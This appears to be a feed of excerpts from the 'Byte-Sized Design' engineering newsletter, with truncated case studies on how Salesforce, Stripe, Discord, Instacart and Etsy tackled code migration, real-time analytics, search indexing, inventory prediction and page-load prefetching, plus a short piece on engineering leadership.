Map dependencies before migration starts. You can’t translate interdependent code in arbitrary order. Graph analysis reveals natural layers and eliminates guesswork.

Automate mechanical translation, validate architectural decisions. Pattern-based rules scale to thousands of files. Human review ensures output matches target patterns. Don’t automate blindly—automate strategically.

Redesign tests around new boundaries. Legacy test suites encode legacy assumptions. Rewrite for behavioral validation, not implementation preservation.

Accept that scale breaks manual processes. 10 files? Manual works. 3,537 files? Manual is a 2-year disaster. Volume forces innovation.

Validation is where correctness lives. Fast code generation means nothing if it ships broken behavior. Systematic testing, bug bashes, and iterative refinement are non-negotiable.

Plan for dual-system maintenance. Migration isn’t flipping a switch. The team maintained both versions simultaneously, 14,000 files managed by the same engineers. Plan capacity accordingly.

Legacy migration isn’t about rewriting old code. It’s about extracting value from proven systems while aligning with modern architectural constraints. Salesforce built a process where “modern” arrived in 4 months, not 2 years.

How Stripe built real-time billing analytics that actually works

Byte-Sized Design — Tue, 09 Dec 2025 08:01:38 GMT

TL;DR

Stripe’s batch-based billing analytics worked fine when updates could wait 24 hours. By 2024, customers demanded real-time visibility into MRR, churn, and conversions because in fast-moving markets, yesterday’s data loses deals today.

The problem? Subscriptions are stateful nightmares. Every $20 payment needs context from months of history. Batch processing couldn’t scale to sub-hour latency. Preaggregated queries were fast but couldn’t incorporate live data. And letting customers change metric definitions meant reprocessing years of history without breaking real-time ingestion.

The fix? Event-driven streaming with Apache Flink. A brand-new Apache Pinot query engine that aggregates on-the-fly. And a dual-mode system that recalculates history while streaming live updates without the dashboard ever going dark.

🚨 The Breaking Points

Batch Processing Hit a Wall

The old system recalculated subscription state by replaying every event from the beginning of time. Want to know if that June payment was on-time? Re-analyze January through June. For every subscription. Every 24 hours.

This worked until customers started asking: “Why can’t I see this trial conversion that just happened?” Because the batch job won’t run for another 18 hours, that’s why.

Preaggregation Made Queries Fast But Data Stale

Apache Pinot delivered sub-second dashboard queries by precomputing MRR over time in offline batch jobs. Fast responses, but baked-in staleness. Real-time streaming meant throwing out preaggregation—which meant risk of slow, unresponsive queries that would make the dashboard unusable.

Custom Metric Definitions Created a Consistency Nightmare

Customers could tweak MRR formulas (exclude coupons, adjust trial periods, etc.). Great for flexibility. Terrible for streaming systems. Change a definition? Now you need to:

Reprocess 8 years of historical data (hours of computation)
Keep streaming new events using the old definition (can’t stop the world)
Somehow merge them without showing Frankenstein data in the dashboard

There was no playbook for this.

🔍 Root Causes

1. Stateful Data Modeled with Stateless Batch Jobs

Subscriptions have memory. Payments build on each other. But the analytics system pretended each batch was independent—forcing full history replays to reconstruct state.

2. OLAP Optimization Assumed Offline Preparation

Pinot’s speed came from precomputed aggregations. Remove that step for real-time data, and suddenly you’re doing complex windowed aggregations at query time—something the original engine couldn’t handle.

3. No Strategy for Incremental Schema Evolution

Metric definition changes were treated as “reindex everything from scratch” events. No concept of applying changes incrementally while preserving consistency.

🧠 The Solution Architecture

How Discord indexes Trillions of messages without falling apart

Byte-Sized Design — Thu, 04 Dec 2025 06:59:26 GMT

TL;DR

Discord’s 2017 search architecture worked beautifully for billions of messages. By 2025, under the weight of trillions, it collapsed. Redis queues dropped messages. Single node failures cascaded into 40% of bulk operations failing. 200+ node clusters became unmanageable. Guilds hit Lucene’s 2 billion message hard limit with no escape.

The fix? Rethink everything. Smaller clusters grouped into “cells.” Smarter message batching by destination. Kubernetes for orchestration. PubSub for guaranteed delivery. And a migration system that could reindex billions of messages without downtime.

🚨 The Breaking Points

Redis Queues Couldn’t Handle Backpressure

When Elasticsearch nodes failed (which happened often), the indexing queue backed up. Redis CPU maxed out. Messages got dropped. Search became incomplete.

Bulk Indexing Was a House of Cards

Workers pulled 50-message batches off the queue. Those messages scattered across 50 different Elasticsearch nodes. One node down? ~40% of bulk operations failed. The entire batch re-queued. Rinse and repeat.

Large Clusters = High Coordination Tax

As message volume grew, Discord added nodes. Clusters ballooned to 200+ nodes. But more nodes meant:

Higher coordination overhead
More frequent failures (any node can fail at any time)
Master nodes OOMing from cluster state management
No safe path for rolling restarts or upgrades

The log4shell vulnerability forced them to take search fully offline just to restart nodes with patched configs.

The Lucene MAX_DOC Ceiling

Each Elasticsearch index is a Lucene index under the hood. Lucene caps at ~2 billion documents per index. Large guilds hit this limit. All indexing operations failed. The only fix? Delete spam guilds and hope legitimate communities stayed under the limit.

🔍 Root Causes

The Three Things Only Engineering Leaders Can Do (And Why They’re Not Doing Them)

Byte-Sized Design — Tue, 25 Nov 2025 06:00:57 GMT

In true Byte-Sized Fashion, no fancy introduction this week, let’s just jump straight into it!

1. They Abdicate Technical Vision to “Emerge Organically”

You hired smart people. You trust them to make g…

How Instacart Scales Real-Time Inventory Predictions Across 80,000 Stores

Byte-Sized Design — Sat, 15 Nov 2025 04:13:47 GMT

Here’s a dirty secret of on-demand commerce: nobody knows the real inventory state of a grocery store. Not the retailer, not the associate, definitely not you.
Instacart’s entire business depends on making that unknowable world feel predictable.

This edition breaks down the engineering architecture Instacart built to simulate a consistent live inventory model across hundreds of millions of items, using a combination of model-driven scoring, lazy refresh pipelines, multi-model experimentation, and a threshold-tuning system that looks more like an F1 control panel than a grocery app.

This is one of those systems where every layer exists because something simpler exploded.

🧠 The Core Problem

Instacart needs to answer one question—fast, correctly, and millions of times per minute:

“If we show this item to a user, how likely is it actually in stock at this specific store… right now?”

This prediction drives:

Search ranking
Product filtering
Shopper routing
Customer trust (“Don’t show me milk if the store is out of milk again”)

The output is a score, a real-time availability probability that feeds downstream systems.

The challenge:

Hundreds of millions of items
80K+ store locations
Score drift happens fast
ML model updates happen constantly
Retrieval systems need bulk reads with low latency
UI surfaces require high consistency

You can’t RPC your way out of this one.

⚙️ Real-Time Scoring, but at Scale

Instacart receives ML scores from a Real-Time Availability model. But calling the scoring API during search retrieval would have been slower than shopping in real life.

So they introduced two ingestion pipelines to push model outputs into the database ahead of time:

1. Full Sync (Snowflake → DB)

ML team writes new scores into a Snowflake table multiple times a day
Ingestion workers upsert those scores into the serving DB
Ensures consistency, especially for long-tail items that rarely get queried

This guarantees freshness, but doing a full sync on hundreds of millions of items is expensive—both financially and operationally.

2. Lazy Refresh (Triggered by Search Results)

How Etsy Reduced Page Load Time to 0ms

Byte-Sized Design — Sun, 09 Nov 2025 04:54:55 GMT

Etsy shipped a performance improvement so dramatic that 40% of their users now see product pages load in essentially zero milliseconds. No infrastructure overhaul. No rewrite. Just a clever use of browser prediction and a 15-line JSON config.

If you’re thinking “prefetching is old news,” I’ve got news: you haven’t seen the Speculation Rules API yet.

The 200ms Window

The traditional web flow is brutally wasteful. User hovers over a product link. User’s brain decides this looks interesting. User moves cursor to click. Click event fires. Browser initiates request. DNS lookup. TCP handshake. TLS negotiation. HTTP request. Server processing. Response headers. HTML starts streaming. Parser kicks in. More requests for CSS, JavaScript, images.

The entire time between hover and click—typically 200-500ms—the browser just sits there. Your user has already made their decision. The machine is waiting for permission.

This is the opportunity Etsy exploited.